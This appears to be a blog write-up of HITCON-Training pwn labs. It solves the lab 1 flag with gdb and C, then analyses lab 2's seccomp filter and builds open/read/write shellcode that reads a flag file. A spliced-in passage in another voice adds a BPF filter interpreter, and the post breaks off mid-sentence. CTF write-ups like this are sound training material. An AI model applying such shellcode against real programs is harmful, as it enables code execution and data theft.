
  1. HITCON-Training
    1.1. Environment Setup
    1.2. Outline
    1.3. Write up
    1.4. LAB 1 [sysmagic]
    1.5. LAB 2 [orw.bin]
      1.5.1. syscall : shellcode

HITCON-Training

For Linux binary Exploitation

Environment Setup

git clone https://github.com/scwuaptx/HITCON-Training.git ~/HITCON-Training
cd ~/HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh

Outline

  • Basic Knowledge

    • Introduction
      • Reverse Engineering
        • Static Analysis
        • Dynamic Analysis
      • Exploitation
      • Useful Tool
        • IDA PRO
        • GDB
        • Pwntool
      • lab 1 - sysmagic
    • Section
    • Compile, linking, assembler
    • Execution
      • how a program gets run
      • Segment
    • x86 assembly
      • Calling convention
      • lab 2 - open/read/write
      • shellcoding
  • Stack Overflow

    • Buffer Overflow
    • Return to Text/Shellcode
      • lab 3 - ret2shellcode
    • Protection
      • ASLR/DEP/PIE/StackGuard
    • Lazy binding
    • Return to Library
      • lab 4 - ret2lib
  • Return Oriented Programming

    • ROP
      • lab 5 - simple rop
    • Using ROP bypass ASLR
      • ret2plt
    • Stack migration
      • lab 6 - migration
  • Format String Attack

    • Format String
    • Read from arbitrary memory
      • lab 7 - crack
    • Write to arbitrary memory
      • lab 8 - craxme
    • Advanced Trick
      • EBP chain
      • lab 9 - playfmt
  • x64 Binary Exploitation

    • x64 assembly
    • ROP
    • Format string Attack
  • Heap exploitation

    • Glibc memory allocator overview
    • Vulnerability on heap
      • Use after free
        • lab 10 - hacknote
      • Heap overflow
        • house of force
          • lab 11 - 1 - bamboobox1
        • unlink
          • lab 11 - 2 - bamboobox2
  • Advanced heap exploitation

    • Fastbin attack
      • lab 12 - babysecretgarden
    • Shrink the chunk
    • Extend the chunk
      • lab 13 - heapcreator
    • Unsorted bin attack
      • lab 14 - magicheap
  • C++ Exploitation

    • Name Mangling
    • Vtable function table
    • Vector & String
    • New & delete
    • Copy constructor & assignment operator
      • lab 15 - zoo
  • Those clever Pwning tricks:

Write up

LAB 1 [sysmagic]

Simple symbolic execution

Decompilation shows that the check is input buf == v2, where buf is a random number, so we can debug it directly in gdb.

if ( buf == v2 )            // 0x8048720 <get_flag+389> cmp edx, eax
{
    for ( i = 0; i <= 0x30; ++i )
        putchar(v5[i] ^ v6[i + 1]);
}

Set a breakpoint at 0x08048712 <+375>: call 0x8048480 <__isoc99_scanf@plt>, then enter any value:

pwndbg> b *get_flag+375
Breakpoint 1 at 0x8048712
pwndbg> set $eax=$edx
pwndbg> b *get_flag+471
Note: breakpoint 2 also set at pc 0x8048772.
Breakpoint 3 at 0x8048772
pwndbg> c
Continuing.
CTF{debugger_1s_so_p0werful_1n_dyn4m1c_4n4lySis!}

Actually I was thinking of another approach: since all the variables are in the program, we can also compute the flag by hand.

#include <stdio.h>

/* Recompute the flag offline: XOR the 49-byte table v5 with buf[1..49],
 * exactly as the loop in get_flag does. */
int main(void) {
    char v5[0x80];
    char buf[0x80] = "BDo_you_know_why_my_teammate_Orange_is_so_angry???";
    int i;
    v5[0] = 7;
    v5[1] = 59;
    v5[2] = 25;
    v5[3] = 2;
    v5[4] = 11;
    v5[5] = 16;
    v5[6] = 61;
    v5[7] = 30;
    v5[8] = 9;
    v5[9] = 8;
    v5[10] = 18;
    v5[11] = 45;
    v5[12] = 40;
    v5[13] = 89;
    v5[14] = 10;
    v5[15] = 0;
    v5[16] = 30;
    v5[17] = 22;
    v5[18] = 0;
    v5[19] = 4;
    v5[20] = 85;
    v5[21] = 22;
    v5[22] = 8;
    v5[23] = 31;
    v5[24] = 7;
    v5[25] = 1;
    v5[26] = 9;
    v5[27] = 0;
    v5[28] = 126;
    v5[29] = 28;
    v5[30] = 62;
    v5[31] = 10;
    v5[32] = 30;
    v5[33] = 11;
    v5[34] = 107;
    v5[35] = 4;
    v5[36] = 66;
    v5[37] = 60;
    v5[38] = 44;
    v5[39] = 91;
    v5[40] = 49;
    v5[41] = 85;
    v5[42] = 2;
    v5[43] = 30;
    v5[44] = 33;
    v5[45] = 16;
    v5[46] = 76;
    v5[47] = 30;
    v5[48] = 0x42;
    /* 0x30 inclusive: 49 output bytes, one per flag character */
    for ( i = 0; i <= 0x30; ++i )
        putchar(v5[i] ^ buf[i + 1]);
    return 0;
}
sb@xulun:~/pwn/HITCON-Training/LAB/lab1$ ./calc 
CTF{debugger_1s_so_p0werful_1n_dyn4m1c_4n4lySis!}

LAB 2 [orw.bin]

syscall : shellcode

This should be the same challenge as orw on pwnable.tw; I looked through write-ups on the internet and am noting it down here.

Only open read write syscall are allowed to use.

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
    orw_seccomp();
    printf("Give my your shellcode:");
    read(0, &shellcode, 0xC8u);
    ((void (*)(void))shellcode)();
    return 0;
}

orw_seccomp

unsigned int orw_seccomp()
{
    __int16 v1; // [esp+4h] [ebp-84h] BYREF
    char *v2; // [esp+8h] [ebp-80h]
    char v3[96]; // [esp+Ch] [ebp-7Ch] BYREF
    unsigned int v4; // [esp+6Ch] [ebp-1Ch]

    v4 = __readgsdword(0x14u);
    qmemcpy(v3, &unk_8048640, sizeof(v3));
    v1 = 12;
    v2 = v3;
    prctl(38, 1, 0, 0, 0);
    prctl(22, 2, &v1);
    return __readgsdword(0x14u) ^ v4;
}

Focus on prctl:

#define PR_SET_SECCOMP	22
/*
 * If no_new_privs is set, then operations that grant new privileges (i.e.
 * execve) will either fail or not grant them. This affects suid/sgid,
 * file capabilities, and LSMs.
 *
 * Operations that merely manipulate or drop existing privileges (setresuid,
 * capset, etc.) will still work. Drop those privileges if you want them gone.
 *
 * Changing LSM security domain is considered a new privilege. So, for example,
 * asking selinux for a specific new context (e.g. with runcon) will result
 * in execve returning -EPERM.
 */
#define PR_SET_NO_NEW_PRIVS 38
prctl(PR_SET_NO_NEW_PRIVS, 1); // required before the SECCOMP_SET_MODE_FILTER operation
sb@xulun:~/pwn/HITCON-Training/LAB/lab2$ seccomp-tools dump ./orw
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x09 0x40000003 if (A != ARCH_I386) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x07 0x00 0x000000ad if (A == rt_sigreturn) goto 0011
0004: 0x15 0x06 0x00 0x00000077 if (A == sigreturn) goto 0011
0005: 0x15 0x05 0x00 0x000000fc if (A == exit_group) goto 0011
0006: 0x15 0x04 0x00 0x00000001 if (A == exit) goto 0011
0007: 0x15 0x03 0x00 0x00000005 if (A == open) goto 0011
0008: 0x15 0x02 0x00 0x00000003 if (A == read) goto 0011
0009: 0x15 0x01 0x00 0x00000004 if (A == write) goto 0011
0010: 0x06 0x00 0x00 0x00050026 return ERRNO(38)
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW

This is the syscall filter: of all system calls, only open, read and write get through to the next step.
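To make the filter's decisions checkable without running the binary, here is an added example (my own code, not from the post or the HITCON-Training repository) that re-encodes the twelve instructions from the seccomp-tools dump above and evaluates them with a small classic-BPF interpreter; the function and constant names are my own, the opcodes, jump offsets and values are the ones in the dump, and the load offsets 0 and 4 are the kernel's nr and arch fields of struct seccomp_data.

```c
#include <stdint.h>
#include <stddef.h>
/* One classic-BPF instruction, laid out like the kernel's struct sock_filter. */
struct bpf_insn { uint16_t code; uint8_t jt, jf; uint32_t k; };
/* Opcodes and constants as they appear in the seccomp-tools dump (labels are mine). */
#define LD_ABS     0x20u        /* A = seccomp_data[k]                        */
#define JEQ_K      0x15u        /* if (A == k) pc += jt; else pc += jf         */
#define RET_K      0x06u        /* return k                                    */
#define ARCH_I386  0x40000003u  /* AUDIT_ARCH_I386                             */
#define RET_ALLOW  0x7fff0000u  /* SECCOMP_RET_ALLOW                           */
#define RET_ENOSYS 0x00050026u  /* SECCOMP_RET_ERRNO | 38, i.e. -ENOSYS        */
/* The twelve instructions orw_seccomp() copies out of unk_8048640 (v1 = 12 is the length). */
static const struct bpf_insn orw_filter[12] = {
    { LD_ABS, 0, 0, 4 },          /* 0000: A = arch                       */
    { JEQ_K,  0, 9, ARCH_I386 },  /* 0001: if (A != ARCH_I386) goto 0011  */
    { LD_ABS, 0, 0, 0 },          /* 0002: A = sys_number                 */
    { JEQ_K,  7, 0, 0xad },       /* 0003: rt_sigreturn -> 0011           */
    { JEQ_K,  6, 0, 0x77 },       /* 0004: sigreturn    -> 0011           */
    { JEQ_K,  5, 0, 0xfc },       /* 0005: exit_group   -> 0011           */
    { JEQ_K,  4, 0, 0x01 },       /* 0006: exit         -> 0011           */
    { JEQ_K,  3, 0, 0x05 },       /* 0007: open         -> 0011           */
    { JEQ_K,  2, 0, 0x03 },       /* 0008: read         -> 0011           */
    { JEQ_K,  1, 0, 0x04 },       /* 0009: write        -> 0011           */
    { RET_K,  0, 0, RET_ENOSYS }, /* 0010: everything else: ERRNO(38)     */
    { RET_K,  0, 0, RET_ALLOW },  /* 0011: ALLOW                          */
};
/* Minimal cBPF interpreter for the three opcodes this filter uses.
 * As in the kernel, jump offsets are relative to the instruction after the jump. */
static uint32_t run_filter(const struct bpf_insn *p, size_t len, uint32_t nr, uint32_t arch)
{
    uint32_t A = 0;
    for (size_t pc = 0; pc < len; pc++) {
        const struct bpf_insn *in = &p[pc];
        switch (in->code) {
        case LD_ABS: A = (in->k == 0) ? nr : (in->k == 4) ? arch : 0; break;
        case JEQ_K:  pc += (A == in->k) ? in->jt : in->jf; break;
        case RET_K:  return in->k;
        default:     return 0; /* unsupported opcode: treat as SECCOMP_RET_KILL */
        }
    }
    return 0; /* running off the end of the program is also a kill */
}
/* Action the orw sandbox takes for syscall number `nr` issued under audit arch `arch`. */
uint32_t orw_filter_action(uint32_t nr, uint32_t arch)
{
    return run_filter(orw_filter, 12, nr, arch);
}
```

When auditing a filter like this, note that instruction 0001 falls through to ALLOW rather than a kill action when the arch is not i386; a hardened filter returns a kill action on any unexpected arch value.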

Following one expert's approach: first open the flag with open, then read it with read, and finally write it to stdout so it shows on screen.

int fd = sys_open("/home/orw/flag");
sys_read(fd, flag, 0x30);
sys_write(1, flag, 0x30);
.bss:0804A060                 public shellcode
.bss:0804A060 shellcode db ? ; ; CODE XREF: main+42↑p
.bss:0804A060 ; DATA XREF: main+2E↑o ...
That author's stack layout:
shellcode at (.bss) 0x0804A060
code at shellcode+0x0, data at shellcode+0x80(0x0804A0E0)
data+0x0 : /home/orw/flag
data+0x20 : [flag]

My observation:

# a few instructions right below the read call
add esp,0x10
mov eax,0x804a060 # shellcode
call eax

eax holds the return value: when we pass the file descriptor returned by open(path) (see pwnable.kr's fd), a handle to a FILE stream, we can read from that handle into another register (edi or esp both work; we just need an address to store it).

from pwn import *  # the snippet needs pwntools' shellcraft

shellcode =  ''
# flag file open
shellcode += shellcraft.open('/home/orw/flag')
# read -> input
shellcode += shellcraft.read('eax', 'edi', 100)
# write -> output
shellcode += shellcraft.write(1, 'edi', 100)

On the assembly side,

Author: wtfff
This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License (CC BY-NC-SA 4.0). This blog is under a CC BY-NC-SA 4.0 Unported License
Link: http://im0use.github.io/2022/06/08/hitcon-train/
